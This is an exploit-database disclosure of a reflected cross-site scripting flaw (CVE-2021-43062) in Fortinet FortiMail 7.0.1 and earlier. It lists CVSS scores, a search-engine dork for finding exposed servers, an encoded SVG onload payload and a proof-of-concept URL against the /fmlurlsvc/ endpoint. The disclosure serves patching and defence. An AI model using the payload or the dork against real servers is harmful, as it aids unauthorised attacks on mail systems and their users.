Fortinet Fortimail 7.0.1 Cross Site Scripting

2022.02.20
Credit: Braiant Giraldo Villa
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2021-43062
CWE: CWE-79
Dork: inurl:/fmlurlsvc/


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS) # Google Dork: inurl:/fmlurlsvc/ # Date: 01-Feb-2022 # Exploit Author: Braiant Giraldo Villa # Contact: @iron_fortress (Twitter) # Vendor Homepage: https://www.fortinet.com/products/email-security # Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online) # Version: # FortiMail version 7.0.1 and below # FortiMail version 6.4.5 and below # FortiMail version 6.2.7 and below # CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185) 1. Description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service. 2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E 3. Proof of Concept: https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E 4. References https://www.fortiguard.com/psirt/FG-IR-21-185 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top